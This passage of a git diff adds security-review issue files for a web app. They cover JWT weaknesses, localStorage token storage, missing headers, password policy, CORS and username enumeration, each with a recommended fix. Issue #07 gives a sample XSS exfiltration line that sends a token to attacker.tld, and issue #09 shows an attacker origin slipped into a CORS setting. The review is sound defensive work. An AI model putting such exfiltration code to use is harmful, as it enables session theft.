+8. **No logout revocation.** `/auth/logout` does not exist in the backend; `setToken(null)` is client-side only ([#19](./19-low-logout-no-revocation.md)).
+9. **`OAuth2PasswordBearer(tokenUrl="/auth/login")`** conflicts with the mounted Starlette `/api` prefix in production. When the app is wrapped behind `Mount("/api", app=app)` (`main.py:197`), the FastAPI-auto-generated OpenAPI swagger UI's "Try it out" points to `/auth/login` at the root, not `/api/auth/login`. Cosmetic but worth fixing.
+10. **`access_token_expire_minutes` is an `int`, user-configurable**, with no lower/upper validation. An operator misconfiguring this to a year is silently accepted.
+
+## Where
+
+- `backend/app/auth.py:15, 30-37, 40-65`
+- `backend/app/config.py:12-14`
+- `backend/app/routers/auth.py:88-102`
+
+## Attack narratives enabled by this
+
+- **Session stealing via XSS:** once a token is exfiltrated (via [#02](./02-critical-stored-xss-html-export.md) or any future XSS), it remains valid for up to 24 hours with no way to revoke.
+- **Credential rotation ineffective:** changing the bcrypt password does not invalidate tokens already issued — `get_current_user` never reads `user.hashed_password`. A compromised user cannot evict an attacker who stole their pre-rotation token.
+- **Key rotation downtime or flag day:** without `kid` (key ID) in the header, operators can't roll secrets without an immediate invalidate-all.
+
+## Recommended fix
+
+### Token contents
+
+```python
+# backend/app/auth.py
+import uuid
+from datetime import UTC, datetime, timedelta
+
+_ISSUER = "rd-log"
+
+def create_access_token(user: User, audience: str) -> str:
+    now = datetime.now(UTC)
+    to_encode = {
+        "sub": str(user.id),                   # immutable numeric ID
+        "preferred_username": user.username,   # optional, for logging
+        "iat": int(now.timestamp()),
+        "nbf": int(now.timestamp()),
+        "exp": int((now + timedelta(minutes=settings.access_token_expire_minutes)).timestamp()),
+        "jti": str(uuid.uuid4()),
+        "iss": _ISSUER,
+        "aud": audience,                       # derive from settings.cors_origins or settings.public_url
+    }
+    return jwt.encode(to_encode, settings.secret_key.get_secret_value(),
+                      algorithm="HS256", headers={"kid": settings.key_id})
+
+
+def get_current_user(
+    token: str = Depends(oauth2_scheme),
+    db: Session = Depends(get_db),
+) -> User:
+    credentials_exception = HTTPException(401, "Could not validate credentials",
+                                          headers={"WWW-Authenticate": "Bearer"})
+    try:
+        payload = jwt.decode(
+            token,
+            settings.secret_key.get_secret_value(),
+            algorithms=["HS256"],                          # hard-coded list
+            issuer=_ISSUER,
+            audience=settings.public_url,
+            options={"require": ["exp", "iat", "sub", "jti", "iss", "aud"]},
+        )
+        sub = payload["sub"]
+        jti = payload["jti"]
+    except jwt.PyJWTError as err:
+        raise credentials_exception from err
+
+    if is_revoked(db, jti):                                # see revocation section
+        raise credentials_exception
+    try:
+        user_id = int(sub)
+    except ValueError as err:
+        raise credentials_exception from err
+    user = db.query(User).filter(User.id == user_id).first()
+    if user is None:
+        raise credentials_exception
+    return user
+```
+
+### Lifetime & refresh
+
+- Reduce access-token lifetime to **15–60 minutes**.
+- Add a **refresh token** (opaque random 256-bit string, stored hashed in DB with per-user revocation) with a 14-day sliding window; issue via `POST /auth/refresh`.
+- Rotate refresh tokens on every use and detect reuse (token replay → revoke the whole family).
+
+### Revocation
+
+Two options:
+- **Blocklist `jti`s** of explicitly-logged-out tokens, stored in Redis or a `revoked_jtis` table with TTL == original exp. Cheap.
+- **Password-bound invalidation**: include `user.password_version` (bumped on password change) as a claim; refuse tokens whose version doesn't match current.
+
+Prefer blocklist + password-version together.
+
+### Logout endpoint
+
+See [#19](./19-low-logout-no-revocation.md).
+
+### Validate configuration
+
+```python
+# config.py
+from pydantic import field_validator
+
+access_token_expire_minutes: int = 60
+
+@field_validator("access_token_expire_minutes")
+@classmethod
+def _cap(cls, v: int) -> int:
+    if not (1 <= v <= 24 * 60):
+        raise ValueError("must be 1..1440")
+    return v
+```
+
+### Future: asymmetric keys
+
+When a second service joins (e.g. a worker or an analytics component), migrate to EdDSA / RS256 with a public-key verification path, so signing authority stays in one service and the secret is not distributed.
+
+## Acceptance criteria
+
+- [ ] Default access-token TTL ≤ 60 minutes; refresh-token TTL documented.
+- [ ] `POST /auth/logout` exists and revokes the current token's `jti`.
+- [ ] Changing a user's password invalidates all pre-change tokens (integration test).
+- [ ] `jwt.decode(..., algorithms=["HS256"])` is a hard-coded list; `settings.algorithm` is removed or narrowed to `Literal["HS256", "RS256"]`.
+- [ ] OpenAPI `tokenUrl` correctly reflects `/api/auth/login` when mounted.
+
+## References
+
+- RFC 8725 (JWT BCP): https://datatracker.ietf.org/doc/html/rfc8725
+- OWASP JWT Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html
+- CWE-613: https://cwe.mitre.org/data/definitions/613.html

--- a/plans/git-issues/security-review/06-high-token-storage-localstorage-xss.md
+++ b/plans/git-issues/security-review/06-high-token-storage-localstorage-xss.md
@@ -1,0 +1,119 @@
+# [High] Access token stored in `localStorage` — fully exposed to any XSS
+
+**Severity:** 🟠 High
+**CVSS v3.1 (estimated):** 7.3 — AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
+**CWEs:** CWE-922 (Insecure Storage of Sensitive Information), CWE-614 (Sensitive Cookie in HTTPS Session Without 'Secure' Attribute — adjacent), CWE-1004 (Sensitive Cookie Without 'HttpOnly' — adjacent)
+**OWASP:** A07:2021 Identification and Authentication Failures, ASVS V3.2.3
+
+## Summary
+
+The SPA stores the bearer token in `localStorage`:
+
+```ts
+// frontend/src/api/client.ts
+export const TOKEN_KEY = "rd_log_token";
+export function setToken(token: string | null): void {
+  if (token) localStorage.setItem(TOKEN_KEY, token);
+  else       localStorage.removeItem(TOKEN_KEY);
+}
+```
+
+`localStorage` is accessible synchronously to any JavaScript running on the same origin. Combined with the lack of CSP ([#07](./07-high-missing-security-headers.md)), any successful XSS (see [#02](./02-critical-stored-xss-html-export.md)) or any malicious third-party dependency loaded from `fonts.googleapis.com` / `fonts.gstatic.com` (currently used for Lato) can read the token and exfiltrate it.
+
+The attacker's window is the remaining TTL (up to 24 hours today — see [#05](./05-high-jwt-design-weaknesses.md)) because the token cannot be revoked server-side.
+
+## Why not "just fix XSS"
+
+Defense in depth. `httpOnly` cookies take the token out of JS reach completely, so a stored XSS loses the session-stealing capability and reduces to "arbitrary actions in the victim's session while the tab is open" — still bad, but recoverable. Multiple real-world breaches (Slack 2023, etc.) trace the final escalation to `localStorage` token theft.
+
+## Where
+
+- `frontend/src/api/client.ts:1-16`
+- `frontend/src/hooks/useAuth.ts:1-97` — reads token via `isLoggedIn()`.
+- `backend/app/routers/auth.py:88-102` — issues token in JSON body, not a Set-Cookie.
+
+## Recommended fix
+
+Move to **HTTP-only, Secure, SameSite=Strict/Lax cookies** for the access token. Add a CSRF token using the **double-submit cookie** pattern because `fetch` is used for state-changing calls.
+
+### Backend
+
+```python
+# backend/app/routers/auth.py
+from fastapi import Response
+from secrets import token_urlsafe
+
+@router.post("/login")
+def login(response: Response, form_data: OAuth2PasswordRequestForm = Depends(), db: Session = Depends(get_db)) -> Token:
+    user = db.query(User).filter(User.username == form_data.username).first()
+    if not user or not verify_password(form_data.password, user.hashed_password):
+        raise HTTPException(401, "Incorrect username or password",
+                            headers={"WWW-Authenticate": "Bearer"})
+
+    access = create_access_token(user, audience=settings.public_url)
+    csrf = token_urlsafe(32)
+    response.set_cookie(
+        "rd_log_token", access,
+        httponly=True, secure=True, samesite="lax",
+        max_age=settings.access_token_expire_minutes * 60,
+        path="/",
+    )
+    response.set_cookie(
+        "rd_log_csrf", csrf,
+        httponly=False, secure=True, samesite="lax",
+        max_age=settings.access_token_expire_minutes * 60,
+        path="/",
+    )
+    return Token(access_token="", token_type="cookie")   # body only for back-compat
+```
+
+Change `get_current_user` to read the cookie **or** `Authorization` header (back-compat for the migration window). Add middleware that, on POST/PUT/DELETE requests, requires the `X-CSRF-Token` header to equal the `rd_log_csrf` cookie value.
+
+### Frontend
+
+```ts
+// frontend/src/api/client.ts
+async function request<T>(path: string, options: RequestInit = {}): Promise<T> {
+  const method = (options.method ?? "GET").toUpperCase();
+  const headers: Record<string, string> = {
+    "Content-Type": "application/json",
+    ...(options.headers as Record<string, string>),
+  };
+  if (method !== "GET" && method !== "HEAD") {
+    const csrf = document.cookie.match(/(?:^|; )rd_log_csrf=([^;]+)/)?.[1];
+    if (csrf) headers["X-CSRF-Token"] = decodeURIComponent(csrf);
+  }
+  const response = await fetch(`${API_BASE}${path}`, {
+    ...options,
+    headers,
+    credentials: "include",
+  });
+  // ...
+}
+```
+
+`setToken` / `getToken` / `TOKEN_KEY` are deleted. `useAuth` checks authentication by calling a cheap `GET /auth/me` at mount and on `storage` events.
+
+### Bonus: Sign out cleanly
+
+Implement `POST /auth/logout` that (a) revokes the JWT `jti` ([#05](./05-high-jwt-design-weaknesses.md)), and (b) sends `Set-Cookie: rd_log_token=; Max-Age=0`.
+
+### If the cookie migration is too expensive short-term
+
+- At minimum, add a **strict CSP** ([#07](./07-high-missing-security-headers.md)) so XSS becomes much harder to land.
+- Add **Trusted Types** (`Content-Security-Policy: require-trusted-types-for 'script'`) — React 19 supports this.
+- Fetch the Lato font from a bundled/self-hosted location instead of Google Fonts to remove that supply-chain leaf.
+
+## Acceptance criteria
+
+- [ ] Login response sets `rd_log_token` cookie with `HttpOnly; Secure; SameSite=Lax`.
+- [ ] `localStorage.getItem("rd_log_token")` returns `null` anywhere in the app.
+- [ ] State-changing requests without an `X-CSRF-Token` header return HTTP 403.
+- [ ] Logout endpoint clears both cookies and revokes the JWT `jti`.
+- [ ] E2E test verifies that document.cookie cannot be read for the access token (`HttpOnly` enforcement).
+
+## References
+
+- OWASP Session Management: https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html
+- CWE-922: https://cwe.mitre.org/data/definitions/922.html
+- Double-submit cookie pattern: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#double-submit-cookie

--- a/plans/git-issues/security-review/07-high-missing-security-headers.md
+++ b/plans/git-issues/security-review/07-high-missing-security-headers.md
@@ -1,0 +1,107 @@
+# [High] Missing security response headers (CSP, HSTS, X-Content-Type-Options, Referrer-Policy, Permissions-Policy)
+
+**Severity:** 🟠 High
+**CVSS v3.1 (estimated):** 6.5 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+**CWEs:** CWE-693 (Protection Mechanism Failure), CWE-1021 (Improper Restriction of Rendered UI Layers or Frames)
+**OWASP:** A05:2021 Security Misconfiguration, API8:2023 Security Misconfiguration, ASVS V14.4
+
+## Summary
+
+`backend/app/main.py` registers only `CORSMiddleware`. No middleware adds Content-Security-Policy, Strict-Transport-Security, X-Content-Type-Options, X-Frame-Options, Referrer-Policy, or Permissions-Policy. The SPA is served with Starlette's `StaticFiles`, which likewise does not set defence headers.
+
+Consequences:
+
+- **No CSP.** Any XSS ([#02](./02-critical-stored-xss-html-export.md)) executes freely and can reach any origin (e.g. `fetch('https://attacker.tld/?t='+token)`).
+- **No HSTS.** First-visit downgrade attacks on hostile networks are possible (the platform may redirect HTTP→HTTPS, but users can still reach `http://` once and be MITM'd).
+- **No `X-Content-Type-Options: nosniff`.** CSV / printable export / JSON responses may be MIME-sniffed by older browsers, enabling content-type confusion attacks.
+- **No `Referrer-Policy`.** Outbound clicks leak the full URL, which may include query parameters in exported URLs (dates).
+- **No `Permissions-Policy`.** Default browser permissions (camera, microphone, geolocation) are implicitly allowed.
+- **No `X-Frame-Options: DENY` / `frame-ancestors 'none'`.** App can be framed; clickjacking on destructive actions (delete assignment, revoke invite) is possible.
+
+## Where
+
+- `backend/app/main.py:140-148` — only CORSMiddleware.
+- `backend/app/main.py:195-201` — Starlette mount for static files; no per-response headers.
+
+## Recommended fix
+
+Add a small middleware that sets a consistent baseline, then tighten per-route.
+
+```python
+# backend/app/middleware.py
+from starlette.middleware.base import BaseHTTPMiddleware
+from starlette.types import ASGIApp
+
+
+class SecurityHeadersMiddleware(BaseHTTPMiddleware):
+    def __init__(self, app: ASGIApp, *, csp: str, is_production: bool) -> None:
+        super().__init__(app)
+        self._csp = csp
+        self._is_production = is_production
+
+    async def dispatch(self, request, call_next):
+        response = await call_next(request)
+        headers = response.headers
+        headers.setdefault("Content-Security-Policy", self._csp)
+        headers.setdefault("X-Content-Type-Options", "nosniff")
+        headers.setdefault("Referrer-Policy", "strict-origin-when-cross-origin")
+        headers.setdefault("Permissions-Policy",
+                           "accelerometer=(), camera=(), geolocation=(), gyroscope=(), "
+                           "magnetometer=(), microphone=(), payment=(), usb=()")
+        headers.setdefault("Cross-Origin-Opener-Policy", "same-origin")
+        headers.setdefault("Cross-Origin-Resource-Policy", "same-origin")
+        if self._is_production:
+            headers.setdefault(
+                "Strict-Transport-Security",
+                "max-age=63072000; includeSubDomains; preload",
+            )
+        return response
+```
+
+Wire it in `main.py` before (outer-most) `CORSMiddleware`:
+
+```python
+CSP = (
+    "default-src 'self'; "
+    "script-src 'self'; "
+    "style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; "
+    "font-src 'self' https://fonts.gstatic.com; "
+    "img-src 'self' data:; "
+    "connect-src 'self'; "
+    "frame-ancestors 'none'; "
+    "base-uri 'self'; "
+    "form-action 'self'; "
+    "object-src 'none'; "
+    "require-trusted-types-for 'script';"
+)
+app.add_middleware(SecurityHeadersMiddleware, csp=CSP,
+                   is_production=settings.environment == "production")
+```
+
+### Route-specific tightenings
+
+- **Printable HTML export** (`/api/export/printable`): emit a stricter per-response CSP — `default-src 'none'; style-src 'unsafe-inline'; font-src https://fonts.gstatic.com; img-src data:` — plus `Content-Disposition: attachment`.
+- **CSV export** (`/api/export/csv`): emit `X-Content-Type-Options: nosniff` explicitly so the CSV is never interpreted as HTML by an old browser.
+- **API JSON responses**: `X-Content-Type-Options: nosniff` is globally set by the middleware above.
+
+### Self-host fonts
+
+Move the Lato font files into the frontend bundle so you can tighten CSP to `font-src 'self'` and remove the `fonts.googleapis.com`/`fonts.gstatic.com` preconnects from `index.html`. Benefits: stricter CSP, no third-party beacon, offline-first, one fewer supply-chain leaf.
+
+### Trusted Types migration (optional, high-value)
+
+React 19 supports Trusted Types. Adding `require-trusted-types-for 'script'` (above) + `trusted-types default` turns *all* DOM-sink writes into policy-controlled ones — eliminates most future DOM XSS classes.
+
+## Acceptance criteria
+
+- [ ] `curl -I https://<deployment>/` shows `content-security-policy`, `strict-transport-security` (prod only), `x-content-type-options`, `referrer-policy`, `permissions-policy`, `cross-origin-opener-policy` headers.
+- [ ] `curl -I https://<deployment>/api/health` shows the same headers.
+- [ ] A test fetches the printable export and verifies a tighter CSP on that path.
+- [ ] `securityheaders.com` graded **A** or better.
+- [ ] Self-hosted Lato font removes all third-party connect-src entries.
+
+## References
+
+- OWASP Secure Headers Project: https://owasp.org/www-project-secure-headers/
+- MDN CSP: https://developer.mozilla.org/docs/Web/HTTP/Headers/Content-Security-Policy
+- Trusted Types intro: https://web.dev/trusted-types/

--- a/plans/git-issues/security-review/08-high-weak-password-policy-bcrypt-truncation.md
+++ b/plans/git-issues/security-review/08-high-weak-password-policy-bcrypt-truncation.md
@@ -1,0 +1,123 @@
+# [High] Weak password policy and silent bcrypt 72-byte truncation
+
+**Severity:** 🟠 High
+**CVSS v3.1 (estimated):** 6.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
+**CWEs:** CWE-521 (Weak Password Requirements), CWE-20 (Improper Input Validation), CWE-916 (Use of Password Hash with Insufficient Computational Effort — adjacent)
+**OWASP:** A07:2021 Identification and Authentication Failures, ASVS V2.1.1–V2.1.9
+
+## Summary
+
+There are no constraints on passwords, and a well-known bcrypt gotcha goes unhandled:
+
+1. **No minimum length / complexity.** `UserCreate` in `schemas.py:10-15` declares `password: str` with no validators. An empty string, a single character, `"password"`, or `"12345678"` are all accepted.
+2. **No maximum length.** `bcrypt.hashpw` silently truncates inputs longer than 72 bytes. Two distinct passwords that share the first 72 bytes hash identically — a user who thinks they chose a 100-character passphrase actually picked a 72-byte one. Worse, if they ever paste a very long string from a password manager with a common prefix, collisions are possible.
+3. **No Pwned Passwords / breach check.** Users can (and do) reuse breached passwords.
+4. **No password reset flow.** Combined with #19 (no token revocation on password change), a compromised user has no clean recovery path.
+5. **Username not validated.** `UserCreate.username` is bare `str` with no regex or length cap. Whitespace-only, `" "`, names with embedded nulls, extreme-length names that would blow through the 255-char column, homoglyph attacks, etc., are all accepted at the API boundary. Any failure cascades into a 500 when the DB rejects.
+
+## Where
+
+- `backend/app/schemas.py:10-15` — `UserCreate` schema.
+- `backend/app/auth.py:18-27` — `hash_password` / `verify_password`.
+- `backend/app/routers/auth.py:19-85` — register handler.
+
+## Recommended fix
+
+### Pydantic validation
+
+```python
+# backend/app/schemas.py
+from pydantic import BaseModel, Field, field_validator
+import unicodedata
+
+USERNAME_RE = r"^[a-z0-9][a-z0-9._-]{2,30}$"
+
+class UserCreate(BaseModel):
+    username: str = Field(min_length=3, max_length=32, pattern=USERNAME_RE)
+    password: str = Field(min_length=12, max_length=128)
+    invite_code: str | None = Field(default=None, pattern=r"^[A-Z0-9]{8}$")
+
+    @field_validator("username", mode="before")
+    @classmethod
+    def _normalise_username(cls, v: str) -> str:
+        v = unicodedata.normalize("NFKC", v).strip().lower()
+        return v
+
+    @field_validator("password")
+    @classmethod
+    def _password_strength(cls, v: str) -> str:
+        # Reject passwords whose *byte* length exceeds bcrypt's 72-byte input ceiling.
+        if len(v.encode("utf-8")) > 72:
+            raise ValueError("password too long (max 72 bytes after UTF-8 encoding)")
+        # Require a minimum of 3 of: lower, upper, digit, symbol. Simple and NIST-compatible.
+        classes = (
+            any(c.islower() for c in v),
+            any(c.isupper() for c in v),
+            any(c.isdigit() for c in v),
+            any(not c.isalnum() for c in v),
+        )
+        if sum(classes) < 2:
+            raise ValueError("password must include at least 2 of: lowercase, uppercase, digit, symbol")
+        return v
+```
+
+### Bcrypt input safety net
+
+```python
+# backend/app/auth.py
+def hash_password(password: str) -> str:
+    if len(password.encode("utf-8")) > 72:
+        raise ValueError("password exceeds 72-byte bcrypt input limit")
+    return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt(rounds=12)).decode("utf-8")
+
+
+def verify_password(plain: str, hashed: str) -> bool:
+    encoded = plain.encode("utf-8")[:72]   # explicit truncation parity with register path
+    return bcrypt.checkpw(encoded, hashed.encode("utf-8"))
+```
+
+(Explicit truncation on verify keeps existing users whose passwords happened to be >72 bytes able to log in, but the length check on register prevents new users from creating ambiguous credentials.)
+
+### Alternative: migrate off bcrypt
+
+`bcrypt` is still acceptable per OWASP ASVS V2.4.1 but has the 72-byte gotcha and tuning caps. Consider **argon2id** via `argon2-cffi`:
+
+```python
+from argon2 import PasswordHasher
+_ph = PasswordHasher(time_cost=3, memory_cost=64 * 1024, parallelism=4)
+
+def hash_password(pw: str) -> str:
+    return _ph.hash(pw)
+
+def verify_password(pw: str, hashed: str) -> bool:
+    try:
+        _ph.verify(hashed, pw)
+        return True
+    except Exception:
+        return False
+```
+
+Argon2id is the current OWASP-preferred KDF; no input length limitation, parameters are in the hash string, and it resists GPU/ASIC attacks better. Migration is feasible by rehashing on successful login.
+
+### Breach check (optional, high-value)
+
+On register / password change, query HaveIBeenPwned Passwords v3 range API with the first 5 hex chars of SHA-1 and reject if the local suffix appears. Offline: ship a compact bloom filter of the top 1M breached passwords.
+
+### Username policy
+
+See the regex above. In addition, reject usernames that normalise-equal an existing username (Unicode confusables) to prevent account impersonation once UIs start showing names alongside avatars.
+
+## Acceptance criteria
+
+- [ ] `POST /auth/register` with `password=""`, `password="short"`, or `password=<73+ bytes>` returns 422.
+- [ ] `POST /auth/register` with `password="correct horse battery staple !" ` succeeds (length & complexity met).
+- [ ] Register with `username="root admin"` returns 422; register with `username="Root"` and a subsequent `"root"` are treated as conflict (case-insensitive unique).
+- [ ] Integration test asserts bcrypt truncation is explicitly prevented: two passwords sharing 72-byte prefix fail on register.
+- [ ] Docs updated: `docs/security/passwords.md` describes policy.
+
+## References
+
+- OWASP ASVS V2.1: https://owasp.org/www-project-application-security-verification-standard/
+- bcrypt 72-byte limitation: https://github.com/pyca/bcrypt/#maximum-password-length
+- NIST SP 800-63B (passwords): https://pages.nist.gov/800-63-3/sp800-63b.html
+- argon2-cffi: https://argon2-cffi.readthedocs.io/

--- a/plans/git-issues/security-review/09-medium-cors-permissive-configuration.md
+++ b/plans/git-issues/security-review/09-medium-cors-permissive-configuration.md
@@ -1,0 +1,101 @@
+# [Medium] Permissive CORS configuration (wildcard methods & headers with credentials)
+
+**Severity:** 🟡 Medium
+**CVSS v3.1 (estimated):** 5.3 — AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N
+**CWEs:** CWE-942 (Permissive Cross-domain Policy with Untrusted Domains), CWE-346 (Origin Validation Error)
+**OWASP:** A05:2021 Security Misconfiguration, API8:2023 Security Misconfiguration, ASVS V14.5
+
+## Summary
+
+The CORS configuration in `backend/app/main.py:142-148` is:
+
+```python
+app.add_middleware(
+    CORSMiddleware,
+    allow_origins=[o.strip() for o in settings.cors_origins.split(",")],
+    allow_credentials=True,
+    allow_methods=["*"],
+    allow_headers=["*"],
+)
+```
+
+Three problems compound:
+
+1. **`allow_methods=["*"]` + `allow_headers=["*"]` + `allow_credentials=True`** is the riskiest legal combination. Modern Starlette's `CORSMiddleware` reflects the request header list rather than echoing `*`, which sidesteps the browser spec prohibition — but it also means a cross-origin attacker with any allowed origin can carry custom headers (including `Authorization` if cookies/token flow ever moves) without preflight limits.
+2. **Origin list parsed from a comma-separated env var with no validation**. `RD_LOG_CORS_ORIGINS=,,http://attacker.tld,http://localhost:5173` yields `["", "", "http://attacker.tld", "http://localhost:5173"]` — the empty strings are tolerated by CORSMiddleware. An operator misconfiguration (e.g. accidentally using `*` or a regex-looking value) gets silently baked into production.
+3. **No protection against null origin** (e.g. local file:// or sandboxed iframe contexts). `null` is not in the default `allow_origins` list, which is fine, but there is no assertion and no test.
+
+Because there is no cookie-based session today (token lives in `Authorization` header / `localStorage`), the practical exploitation surface via CORS is narrow right now. That changes the moment cookies are introduced ([#06](./06-high-token-storage-localstorage-xss.md)) or if a third-party site is added to `allow_origins` for any reason.
+
+## Where
+
+- `backend/app/main.py:142-148`
+- `backend/app/config.py:14` — default `"http://localhost:5173,http://localhost:3000"`.
+- `.env.example:17` — operator-facing documentation.
+
+## Recommended fix
+
+```python
+# backend/app/main.py
+from urllib.parse import urlparse
+
+def _parse_origins(raw: str) -> list[str]:
+    origins: list[str] = []
+    for entry in raw.split(","):
+        o = entry.strip()
+        if not o:
+            continue
+        parsed = urlparse(o)
+        if parsed.scheme not in ("http", "https"):
+            raise RuntimeError(f"Invalid CORS origin (scheme): {o!r}")
+        if not parsed.netloc:
+            raise RuntimeError(f"Invalid CORS origin (host): {o!r}")
+        if parsed.scheme == "http" and parsed.hostname not in ("localhost", "127.0.0.1"):
+            raise RuntimeError(f"Refusing non-HTTPS origin outside localhost: {o!r}")
+        if o == "*":
+            raise RuntimeError("Wildcard CORS origin is not allowed with credentials")
+        origins.append(o)
+    return origins
+
+
+app.add_middleware(
+    CORSMiddleware,
+    allow_origins=_parse_origins(settings.cors_origins),
+    allow_credentials=True,
+    allow_methods=["GET", "POST", "PUT", "DELETE", "OPTIONS"],
+    allow_headers=["Authorization", "Content-Type", "X-CSRF-Token", "X-Requested-With"],
+    expose_headers=["Content-Disposition"],
+    max_age=600,
+)
+```
+
+### Defence-in-depth
+
+- Add a startup assertion: if the app is running at `environment == "production"` and any origin is non-HTTPS (except `localhost` in test harnesses), log an error and refuse to start.
+- Add a unit test over `_parse_origins` covering empties, wildcards, bad schemes, and mixed cases.
+- If the API domain is same-origin with the SPA in production (via Railway Starlette mount), **remove** CORSMiddleware entirely for the production path — it is unnecessary when the SPA is served from the same origin and only invites misconfiguration.
+
+### API vs. SPA split
+
+`main.py` mounts `api` at `/api` when `static/dist/` exists. In that deployment mode, CORS is not needed at all. Add:
+
+```python
+if _static_dir.is_dir():
+    # same-origin deployment: no CORS needed
+    pass
+else:
+    app.add_middleware(CORSMiddleware, ...)
+```
+
+## Acceptance criteria
+
+- [ ] Deployment with same-origin SPA does not add `Access-Control-Allow-Origin` to responses at all.
+- [ ] Origin string with `*`, empty entry, or `http://` (non-localhost) fails startup in production.
+- [ ] Allowed methods/headers are explicit lists, not `["*"]`.
+- [ ] Unit tests cover origin parsing edge cases.
+
+## References
+
+- MDN CORS: https://developer.mozilla.org/docs/Web/HTTP/CORS
+- OWASP CORS Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#cors
+- CWE-942: https://cwe.mitre.org/data/definitions/942.html

--- a/plans/git-issues/security-review/10-medium-username-enumeration.md
+++ b/plans/git-issues/security-review/10-medium-username-enumeration.md
@@ -1,0 +1,75 @@
+# [Medium] Username enumeration on registration endpoint
+
+**Severity:** 🟡 Medium
+**CVSS v3.1 (estimated):** 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+**CWEs:** CWE-203 (Observable Discrepancy), CWE-204 (Observable Response Discrepancy)
+**OWASP:** ASVS V3.2.2 / V2.1.12
+
+## Summary
+
+`POST /auth/register` responds with `"Username already registered"` when the chosen username exists (`backend/app/routers/auth.py:22-27`). This confirms account existence without authentication and without rate limiting (see [#04](./04-high-no-auth-rate-limiting.md)). An attacker can:
+
+1. Enumerate which usernames are in use.
+2. Feed that list into password-spraying attacks against `/auth/login` (also unrate-limited).
+3. Combine with invite-code abuse ([#11](./11-medium-invite-code-abuse.md)) to identify which groups the user is in.
+
+`/auth/login` does use a generic `"Incorrect username or password"` — good — but that defence is undone by the register endpoint.
+
+Secondary source of enumeration: `/speakers/names` (`routers/speakers.py:17`) returns all speaker names in the group — if a group member uses their real name as both speaker and username, speaker listings trivially leak usernames.
+
+## Where
+
+- `backend/app/routers/auth.py:22-27`
+- `backend/app/routers/speakers.py:17-33` (secondary, smaller risk)
+
+## Recommended fix
+
+Two complementary patterns:
+
+### Option A — Uniform response ("we've sent a confirmation")
+
+Introduce an account-confirmation email flow. Register always returns `202 Accepted` with "If the username is available, you'll receive a confirmation shortly" regardless of whether the username existed. Creation happens on confirmation-link click.
+
+### Option B — Uniform error + rate limiting
+
+If email confirmation is not planned:
+
+```python
+if existing or invalid_username:
+    # Uniform response for both "already taken" and "invalid format"
+    raise HTTPException(400, "Registration failed — try a different username")
+```
+
+Combine with per-IP rate limit of 5 registrations / hour ([#04](./04-high-no-auth-rate-limiting.md)) and per-IP /login limit.
+
+### Timing
+
+Ensure the register handler performs a dummy bcrypt hash when the username exists so attackers cannot distinguish "exists" from "doesn't exist" via timing:
+
+```python
+_DUMMY_HASH = bcrypt.hashpw(b"timing-safety", bcrypt.gensalt()).decode()
+
+def register(...):
+    existing = db.query(User).filter(User.username == user_in.username).first()
+    if existing:
+        bcrypt.checkpw(user_in.password.encode(), _DUMMY_HASH.encode())   # match timing
+        raise HTTPException(400, "Registration failed — try a different username")
+    ...
+```
+
+### Audit
+
+Re-audit other endpoints for enumeration:
+- `GET /speakers/names` — already returns names but is authenticated and scoped to group; acceptable.
+- `POST /topics/` `detail=...` error — currently none that reveals existence; OK.
+
+## Acceptance criteria
+
+- [ ] Timing analysis of 100 register attempts for existing vs. non-existing usernames produces indistinguishable distributions (assert p-value > 0.05 via a t-test in a dedicated test).
+- [ ] Register error text is identical regardless of root cause (conflict vs. validation).
+- [ ] Integration test verifies that `existing` and `valid-but-available` usernames both yield the same response body.
+
+## References
+
+- OWASP "Testing for Account Enumeration": https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account
+- CWE-203: https://cwe.mitre.org/data/definitions/203.html

--- a/plans/git-issues/security-review/11-medium-invite-code-abuse.md
+++ b/plans/git-issues/security-review/11-medium-invite-code-abuse.md
@@ -1,0 +1,95 @@
+# [Medium] Invite-code brute force and unrestricted group joining
+
+**Severity:** 🟡 Medium
+**CVSS v3.1 (estimated):** 5.4 — AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+**CWEs:** CWE-330 (Use of Insufficiently Random Values — adjacent), CWE-521 (Weak Password Requirements), CWE-799 (Improper Control of Interaction Frequency)
+**OWASP:** A07:2021 Identification and Authentication Failures, A01:2021 Broken Access Control
+
+## Summary
+
+Invite codes are 8 characters over a 32-character alphabet (`ABCDEFGHJKLMNPQRSTUVWXYZ23456789`) — roughly 2^40 ≈ 1.1 × 10¹² combinations. That sounds like a lot, but:
+
+- **No rate limit on `/auth/register` with invite_code** ([#04](./04-high-no-auth-rate-limiting.md)). An attacker can guess at tens of attempts per second per IP, thousands with a botnet.
+- **Invite codes are long-lived.** They do not expire. They are revoked only if an admin explicitly clicks "revoke" in Settings. Groups often forget.
+- **A correct guess silently adds the attacker to the group** with full privileges (see [#12](./12-medium-no-rbac-or-admin-roles.md)). No admin approval, no notification to existing members.
+- **Invite codes are per-group unique but a single code has no per-use limit.** Anyone who learns a code once can share it or mint unlimited accounts into the group.
+- **Validation mismatch.** `find_group_by_invite_code` uses `code.upper()` (`services.py:887`) but `InviteCode` is returned directly in uppercase from `generate_invite_code`. If any code path ever stored a lowercase value, the lookup would fail silently.
+- **Code generation is "10 attempts only"** in `generate_invite_code` (`services.py:869`). On collision, it raises `ValueError` rather than expanding the attempt count, opening a micro DoS on new-invite generation if an attacker fills enough codes — not a real risk at 2^40 but worth noting.
+
+## Attack narratives
+
